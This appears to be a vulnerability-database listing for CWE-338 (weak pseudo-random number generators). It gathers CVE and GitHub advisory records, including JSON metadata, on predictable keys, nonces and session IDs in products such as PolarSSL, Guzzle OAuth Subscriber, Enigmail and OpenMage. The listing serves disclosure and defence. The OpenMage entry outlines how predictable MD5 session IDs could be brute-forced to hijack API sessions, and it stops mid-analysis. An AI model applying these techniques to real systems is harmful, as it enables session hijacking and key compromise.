Common Weakness Enumeration

CWE-338

Allowed

Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)

Abstraction: Base · Status: Draft

The product uses a Pseudo-Random Number Generator (PRNG) in a security context, but the PRNG's algorithm is not cryptographically strong.

293 vulnerabilities reference this CWE, most recent first.

CVE-2014-2362 (GCVE-0-2014-2362)

Vulnerability from cvelistv5 – Published: 2014-07-24 14:00 – Updated: 2025-10-06 17:33
VLAI
Title
OleumTech WIO Use of Cryptographically Weak Pseudo-Random Number Generator
Summary
OleumTech WIO DH2 Wireless Gateway and Sensor Wireless I/O Modules rely exclusively on a time value for entropy in key generation, which makes it easier for remote attackers to defeat cryptographic protection mechanisms by predicting the time of project creation.
Severity
No CVSS data available.
CWE
Assigner
Impacted products
Date Public
2014-07-21 06:00
Credits
Lucas Apa and Carlos Mario Penagos Hollman of IOActive
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T10:14:25.268Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "68800",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/68800"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://ics-cert.us-cert.gov/advisories/ICSA-14-202-01"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "WIO DH2 Wireless Gateway",
          "vendor": "OleumTech",
          "versions": [
            {
              "status": "affected",
              "version": "All versions"
            }
          ]
        },
        {
          "defaultStatus": "unaffected",
          "product": "Sensor Wireless I/O Modules",
          "vendor": "OleumTech",
          "versions": [
            {
              "status": "affected",
              "version": "All versions"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "Lucas Apa and Carlos Mario Penagos Hollman of IOActive"
        }
      ],
      "datePublic": "2014-07-21T06:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cp\u003e\n\nOleumTech WIO DH2 Wireless Gateway and Sensor Wireless I/O Modules rely exclusively on a time value for entropy in key generation, which makes it easier for remote attackers to defeat cryptographic protection mechanisms by predicting the time of project creation.\n\n\u003c/p\u003e"
            }
          ],
          "value": "OleumTech WIO DH2 Wireless Gateway and Sensor Wireless I/O Modules rely exclusively on a time value for entropy in key generation, which makes it easier for remote attackers to defeat cryptographic protection mechanisms by predicting the time of project creation."
        }
      ],
      "metrics": [
        {
          "cvssV2_0": {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "availabilityImpact": "NONE",
            "baseScore": 7.8,
            "confidentialityImpact": "COMPLETE",
            "integrityImpact": "PARTIAL",
            "vectorString": "AV:N/AC:M/Au:N/C:C/I:P/A:N",
            "version": "2.0"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-338",
              "description": "CWE-338",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-10-06T17:33:48.282Z",
        "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6",
        "shortName": "icscert"
      },
      "references": [
        {
          "name": "68797",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/68797"
        },
        {
          "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-14-202-01a"
        },
        {
          "url": "http://support.oleumtech.com/"
        }
      ],
      "solutions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "OleumTech has created updates for both BreeZ and the gateway to mitigate\n all these vulnerabilities. These updates allow users to encrypt their \nwireless traffic with AES256. To obtain these updates, please log in to \nthe OleumTech download center (\u003ca target=\"_blank\" rel=\"nofollow\" href=\"http://support.oleumtech.com/\"\u003ehttp://support.oleumtech.com/\u003c/a\u003e\u0026nbsp;) or contact OleumTech tech support:\u003cp\u003ePhone: 866-508-8586\u003c/p\u003e\n\u003cp\u003eEmail: \u003ca target=\"_blank\" rel=\"nofollow\"\u003eTechSupport@OleumTech.com\u003c/a\u003e\u003c/p\u003e"
            }
          ],
          "value": "OleumTech has created updates for both BreeZ and the gateway to mitigate\n all these vulnerabilities. These updates allow users to encrypt their \nwireless traffic with AES256. To obtain these updates, please log in to \nthe OleumTech download center ( http://support.oleumtech.com/ \u00a0) or contact OleumTech tech support:Phone: 866-508-8586\n\n\nEmail: TechSupport@OleumTech.com"
        }
      ],
      "source": {
        "advisory": "ICSA-14-202-01",
        "discovery": "EXTERNAL"
      },
      "title": "OleumTech WIO Use of Cryptographically Weak Pseudo-Random Number Generator",
      "x_generator": {
        "engine": "Vulnogram 0.2.0"
      },
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "ics-cert@hq.dhs.gov",
          "ID": "CVE-2014-2360",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "OleumTech WIO DH2 Wireless Gateway and Sensor Wireless I/O Modules allow remote attackers to execute arbitrary code via packets that report a high battery voltage."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "68797",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/68797"
            },
            {
              "name": "http://ics-cert.us-cert.gov/advisories/ICSA-14-202-01",
              "refsource": "MISC",
              "url": "http://ics-cert.us-cert.gov/advisories/ICSA-14-202-01"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6",
    "assignerShortName": "icscert",
    "cveId": "CVE-2014-2362",
    "datePublished": "2014-07-24T14:00:00.000Z",
    "dateReserved": "2014-03-13T00:00:00.000Z",
    "dateUpdated": "2025-10-06T17:33:48.282Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2011-4574 (GCVE-0-2011-4574)

Vulnerability from cvelistv5 – Published: 2021-10-27 00:52 – Updated: 2024-08-07 00:09
VLAI
Summary
PolarSSL versions prior to v1.1 use the HAVEGE random number generation algorithm. At its heart, this uses timing information based on the processor's high resolution timer (the RDTSC instruction). This instruction can be virtualized, and some virtual machine hosts have chosen to disable this instruction, returning 0s or predictable results.
Severity
No CVSS data available.
CWE
Assigner
References
Impacted products
Vendor Product Version
n/a PolarSSL Affected: PolarSSL 1.1.0
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T00:09:19.410Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://tls.mbed.org/tech-updates/security-advisories/polarssl-security-advisory-2011-02"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "PolarSSL",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "PolarSSL 1.1.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "PolarSSL versions prior to v1.1 use the HAVEGE random number generation algorithm. At its heart, this uses timing information based on the processor\u0027s high resolution timer (the RDTSC instruction). This instruction can be virtualized, and some virtual machine hosts have chosen to disable this instruction, returning 0s or predictable results."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-338",
              "description": "CWE-338",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-10-27T00:52:57.000Z",
        "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
        "shortName": "redhat"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://tls.mbed.org/tech-updates/security-advisories/polarssl-security-advisory-2011-02"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "secalert@redhat.com",
          "ID": "CVE-2011-4574",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "PolarSSL",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "PolarSSL 1.1.0"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "PolarSSL versions prior to v1.1 use the HAVEGE random number generation algorithm. At its heart, this uses timing information based on the processor\u0027s high resolution timer (the RDTSC instruction). This instruction can be virtualized, and some virtual machine hosts have chosen to disable this instruction, returning 0s or predictable results."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-338"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://tls.mbed.org/tech-updates/security-advisories/polarssl-security-advisory-2011-02",
              "refsource": "MISC",
              "url": "https://tls.mbed.org/tech-updates/security-advisories/polarssl-security-advisory-2011-02"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
    "assignerShortName": "redhat",
    "cveId": "CVE-2011-4574",
    "datePublished": "2021-10-27T00:52:57.000Z",
    "dateReserved": "2011-11-29T00:00:00.000Z",
    "dateUpdated": "2024-08-07T00:09:19.410Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2008-3280 (GCVE-0-2008-3280)

Vulnerability from cvelistv5 – Published: 2021-05-21 19:23 – Updated: 2024-08-07 09:28
VLAI
Summary
It was found that various OpenID Providers (OPs) had TLS Server Certificates that used weak keys, as a result of the Debian Predictable Random Number Generator (CVE-2008-0166). In combination with the DNS Cache Poisoning issue (CVE-2008-1447) and the fact that almost all SSL/TLS implementations do not consult CRLs (currently an untracked issue), this means that it is impossible to rely on these OPs.
Severity
No CVSS data available.
CWE
Assigner
References
Impacted products
Vendor Product Version
n/a openid Affected: unknown
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T09:28:42.000Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://lists.openid.net/pipermail/openid-security/2008-August/000942.html"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.exploit-db.com/exploits/5720"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "openid",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "unknown"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "It was found that various OpenID Providers (OPs) had TLS Server Certificates that used weak keys, as a result of the Debian Predictable Random Number Generator (CVE-2008-0166). In combination with the DNS Cache Poisoning issue (CVE-2008-1447) and the fact that almost all SSL/TLS implementations do not consult CRLs (currently an untracked issue), this means that it is impossible to rely on these OPs."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-338",
              "description": "CWE-338",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-05-21T19:23:55.000Z",
        "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
        "shortName": "redhat"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://lists.openid.net/pipermail/openid-security/2008-August/000942.html"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.exploit-db.com/exploits/5720"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "secalert@redhat.com",
          "ID": "CVE-2008-3280",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "openid",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "unknown"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "It was found that various OpenID Providers (OPs) had TLS Server Certificates that used weak keys, as a result of the Debian Predictable Random Number Generator (CVE-2008-0166). In combination with the DNS Cache Poisoning issue (CVE-2008-1447) and the fact that almost all SSL/TLS implementations do not consult CRLs (currently an untracked issue), this means that it is impossible to rely on these OPs."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-338"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://lists.openid.net/pipermail/openid-security/2008-August/000942.html",
              "refsource": "MISC",
              "url": "http://lists.openid.net/pipermail/openid-security/2008-August/000942.html"
            },
            {
              "name": "https://www.exploit-db.com/exploits/5720",
              "refsource": "MISC",
              "url": "https://www.exploit-db.com/exploits/5720"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
    "assignerShortName": "redhat",
    "cveId": "CVE-2008-3280",
    "datePublished": "2021-05-21T19:23:55.000Z",
    "dateReserved": "2008-07-24T00:00:00.000Z",
    "dateUpdated": "2024-08-07T09:28:42.000Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2002-20002 (GCVE-0-2002-20002)

Vulnerability from cvelistv5 – Published: 2025-01-02 00:00 – Updated: 2025-01-06 21:08
VLAI
Summary
The Net::EasyTCP package before 0.15 for Perl always uses Perl's builtin rand(), which is not a strong random number generator, for cryptographic keys.
SSVC
Exploitation: none Automatable: no Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
  • CWE-338 - Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)
Assigner
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2002-20002",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-01-06T21:08:18.044511Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-01-06T21:08:29.156Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "The Net::EasyTCP package before 0.15 for Perl always uses Perl\u0027s builtin rand(), which is not a strong random number generator, for cryptographic keys."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-338",
              "description": "CWE-338 Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-01-02T05:00:27.855Z",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "url": "https://metacpan.org/release/MNAGUIB/EasyTCP-0.26/changes"
        },
        {
          "url": "https://github.com/briandfoy/cpan-security-advisory/issues/184"
        },
        {
          "url": "https://metacpan.org/release/MNAGUIB/EasyTCP-0.15/view/EasyTCP.pm"
        }
      ],
      "x_generator": {
        "engine": "enrichogram 0.0.1"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2002-20002",
    "datePublished": "2025-01-02T00:00:00.000Z",
    "dateReserved": "2025-01-02T00:00:00.000Z",
    "dateUpdated": "2025-01-06T21:08:29.156Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

GHSA-237R-R8M4-4Q88

Vulnerability from github – Published: 2025-01-06 19:23 – Updated: 2025-01-06 22:15
VLAI
Summary
Guzzle OAuth Subscriber has insufficient nonce entropy
Details

Impact

Nonce generation does not use sufficient entropy nor a cryptographically secure pseudorandom source (https://github.com/guzzle/oauth-subscriber/blob/0.8.0/src/Oauth1.php#L192). This can leave servers vulnerable to replay attacks when TLS is not used.

Patches

Upgrade to version 0.8.1 or higher.

Workarounds

No.

References

Issue is similar to https://nvd.nist.gov/vuln/detail/CVE-2025-22376.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "guzzlehttp/oauth-subscriber"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.8.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-21617"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-338"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-01-06T19:23:26Z",
    "nvd_published_at": "2025-01-06T20:15:39Z",
    "severity": "MODERATE"
  },
  "details": "### Impact\n\nNonce generation does not use sufficient entropy nor a cryptographically secure pseudorandom source (https://github.com/guzzle/oauth-subscriber/blob/0.8.0/src/Oauth1.php#L192). This can leave servers vulnerable to replay attacks when TLS is not used.\n\n### Patches\n\nUpgrade to version 0.8.1 or higher.\n\n### Workarounds\n\nNo.\n\n### References\n\nIssue is similar to https://nvd.nist.gov/vuln/detail/CVE-2025-22376.\n",
  "id": "GHSA-237r-r8m4-4q88",
  "modified": "2025-01-06T22:15:06Z",
  "published": "2025-01-06T19:23:26Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/guzzle/oauth-subscriber/security/advisories/GHSA-237r-r8m4-4q88"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-21617"
    },
    {
      "type": "WEB",
      "url": "https://github.com/guzzle/oauth-subscriber/commit/92b619b03bd21396e51c62e6bce83467d2ce8f53"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/guzzle/oauth-subscriber"
    },
    {
      "type": "WEB",
      "url": "https://github.com/guzzle/oauth-subscriber/blob/0.8.0/src/Oauth1.php#L192"
    },
    {
      "type": "WEB",
      "url": "https://github.com/guzzle/oauth-subscriber/releases/tag/0.8.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Guzzle OAuth Subscriber has insufficient nonce entropy"
}

GHSA-23RF-WQ7X-GVQ7

Vulnerability from github – Published: 2025-04-07 15:31 – Updated: 2025-04-07 21:32
VLAI
Details

WebService::Xero 0.11 and earlier for Perl uses the rand() function as the default source of entropy, which is not cryptographically secure, for cryptographic functions.

Specifically WebService::Xero uses the Data::Random library which specifically states that it is "Useful mostly for test programs". Data::Random uses the rand() function.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-52322"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-331",
      "CWE-338"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-04-05T17:15:39Z",
    "severity": "MODERATE"
  },
  "details": "WebService::Xero 0.11 and earlier for Perl uses the rand() function as the default source of entropy, which is not cryptographically secure, for cryptographic functions.\n\nSpecifically WebService::Xero uses the Data::Random library which specifically states that it is \"Useful mostly for test programs\". Data::Random uses the rand() function.",
  "id": "GHSA-23rf-wq7x-gvq7",
  "modified": "2025-04-07T21:32:07Z",
  "published": "2025-04-07T15:31:11Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-52322"
    },
    {
      "type": "WEB",
      "url": "https://metacpan.org/release/BAREFOOT/Data-Random-0.13/source/lib/Data/Random.pm#L537"
    },
    {
      "type": "WEB",
      "url": "https://metacpan.org/release/LOCALSHOP/WebService-Xero-0.11/source/lib/WebService/Xero/Agent.pm#L17"
    },
    {
      "type": "WEB",
      "url": "https://metacpan.org/release/LOCALSHOP/WebService-Xero-0.11/source/lib/WebService/Xero/Agent.pm#L178"
    },
    {
      "type": "WEB",
      "url": "https://metacpan.org/release/LOCALSHOP/WebService-Xero-0.11/source/lib/WebService/Xero/Agent/PublicApplication.pm#L13"
    },
    {
      "type": "WEB",
      "url": "https://metacpan.org/release/LOCALSHOP/WebService-Xero-0.11/source/lib/WebService/Xero/Agent/PublicApplication.pm#L93"
    },
    {
      "type": "WEB",
      "url": "https://perldoc.perl.org/functions/rand"
    },
    {
      "type": "WEB",
      "url": "https://security.metacpan.org/docs/guides/random-data-for-security.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-257H-H5GH-R9CX

Vulnerability from github – Published: 2022-05-14 03:46 – Updated: 2025-04-20 03:50
VLAI
Details

An issue was discovered in Enigmail before 1.9.9. Improper Random Secret Generation occurs because Math.Random() is used by pretty Easy privacy (pEp), aka TBE-01-001.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2017-17845"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-338"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-12-27T17:08:00Z",
    "severity": "HIGH"
  },
  "details": "An issue was discovered in Enigmail before 1.9.9. Improper Random Secret Generation occurs because Math.Random() is used by pretty Easy privacy (pEp), aka TBE-01-001.",
  "id": "GHSA-257h-h5gh-r9cx",
  "modified": "2025-04-20T03:50:29Z",
  "published": "2022-05-14T03:46:15Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-17845"
    },
    {
      "type": "WEB",
      "url": "https://enigmail.net/download/other/Enigmail%20Pentest%20Report%20by%20Cure53%20-%20Excerpt.pdf"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2017/12/msg00021.html"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-security-announce/2017/msg00333.html"
    },
    {
      "type": "WEB",
      "url": "https://www.debian.org/security/2017/dsa-4070"
    },
    {
      "type": "WEB",
      "url": "https://www.mail-archive.com/enigmail-users%40enigmail.net/msg04280.html"
    },
    {
      "type": "WEB",
      "url": "https://www.mail-archive.com/enigmail-users@enigmail.net/msg04280.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-27G5-F3JP-4F93

Vulnerability from github – Published: 2022-05-24 19:15 – Updated: 2023-06-30 18:31
VLAI
Details

Vulnerability in the generation of session IDs in revive-adserver < 5.3.0, based on the cryptographically insecure uniqid() PHP function. Under some circumstances, an attacker could theoretically be able to brute force session IDs in order to take over a specific account.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-22948"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-327",
      "CWE-338",
      "CWE-79"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-09-23T13:15:00Z",
    "severity": "HIGH"
  },
  "details": "Vulnerability in the generation of session IDs in revive-adserver \u003c 5.3.0, based on the cryptographically insecure uniqid() PHP function. Under some circumstances, an attacker could theoretically be able to brute force session IDs in order to take over a specific account.",
  "id": "GHSA-27g5-f3jp-4f93",
  "modified": "2023-06-30T18:31:00Z",
  "published": "2022-05-24T19:15:35Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-22948"
    },
    {
      "type": "WEB",
      "url": "https://hackerone.com/reports/1187820"
    },
    {
      "type": "WEB",
      "url": "https://www.revive-adserver.com/security/revive-sa-2021-005"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-2C59-FQG7-RWRX

Vulnerability from github – Published: 2026-05-15 12:30 – Updated: 2026-05-15 18:30
VLAI
Details

Apache::Session::Generate::SHA256 versions before 1.3.19 for Perl create insecure session ids.

Apache::Session::Generate::SHA256 generated session ids insecurely. The default session id generator returns a SHA-256 hash of the built-in rand() function, the epoch time, and the PID, that is hashed again. These are predictable, low-entropy sources. Predicable session ids could allow an attacker to gain access to systems.

Note that version 1.3.19 has a fallback without warning to use insecure session generation method if the call to Crypt::URandom::urandom fails. However, this is unlikely as Crypt::URandom is a hardcoded requirement of the module.

This issue is similar to CVE-2025-40931 for Apache::Session::Generate::MD5.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-8503"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-338"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-05-15T12:17:09Z",
    "severity": "MODERATE"
  },
  "details": "Apache::Session::Generate::SHA256 versions before 1.3.19 for Perl create insecure session ids.\n\nApache::Session::Generate::SHA256 generated session ids insecurely. The default session id generator returns a SHA-256 hash of the built-in rand() function, the epoch time, and the PID, that is hashed again. These are predictable, low-entropy sources. Predicable session ids could allow an attacker to gain access to systems.\n\nNote that version 1.3.19 has a fallback without warning to use insecure session generation method if the call to Crypt::URandom::urandom fails. However, this is unlikely as Crypt::URandom is a hardcoded requirement of the module.\n\nThis issue is similar to CVE-2025-40931 for Apache::Session::Generate::MD5.",
  "id": "GHSA-2c59-fqg7-rwrx",
  "modified": "2026-05-15T18:30:33Z",
  "published": "2026-05-15T12:30:31Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8503"
    },
    {
      "type": "WEB",
      "url": "https://github.com/LemonLDAPNG/Apache-Session-Browseable/commit/cc915cbbd266776eec3dd8bf4748b15fa827dbd0.patch"
    },
    {
      "type": "WEB",
      "url": "https://metacpan.org/release/GUIMARD/Apache-Session-Browseable-1.3.19/changes"
    },
    {
      "type": "WEB",
      "url": "https://metacpan.org/release/GUIMARD/Apache-Session-Browseable-1.3.19/diff/GUIMARD/Apache-Session-Browseable-1.3.18#lib/Apache/Session/Generate/SHA256.pm"
    },
    {
      "type": "WEB",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-40931"
    },
    {
      "type": "WEB",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-40932"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-2CWR-GCF9-PVXR

Vulnerability from github – Published: 2026-05-05 19:35 – Updated: 2026-05-15 23:48
VLAI
Summary
Magento LTS has Weak API Session ID — Predictable MD5 of Time-Derived Inputs
Details

Affected Version: OpenMage LTS ≤ 20.16.0 (confirmed on 20.16.0)

Affected File: https://github.com/OpenMage/magento-lts/blob/main/app/code/core/Mage/Api/Model/Session.phpstart() method

Summary

The XML-RPC / SOAP API session ID is generated using an outdated, time-based construction rather than a Cryptographically Secure Pseudo-Random Number Generator (CSPRNG):

The XML-RPC / SOAP API session ID is generated using an outdated, time-based construction rather than a Cryptographically Secure Pseudo-Random Number Generator (CSPRNG):

All inputs to the MD5 hash are time-derived and non-secure:

Input Value Predictability
time() Unix timestamp (seconds) Fully predictable
uniqid('', true) prefix sprintf('%08x%05x', $sec, $usec/10) Highly predictable via network timing
uniqid('', true) suffix php_combined_lcg() decimal float Process-state dependent (getpid() ^ time())
$sessionName null (empty) — called without arg Constant

Because the resulting digest relies entirely on the timestamp and the PHP internal LCG state, the effective entropy is severely constrained. This violates the OWASP ASVS v4 requirement of ≥ 64 bits of entropy (V3.2.2) and NIST SP 800-63B standards. By narrowing the LCG window (via server state leaks or general predictability) and leveraging the lack of API rate-limiting, an attacker can generate a localized pool of candidate MD5 hashes and execute a high-speed online brute-force attack to hijack active API sessions.

Technical Analysis

Code Path

POST /api/xmlrpc/ → login(username, apiKey)
  → Mage_Api_Model_Session::login()
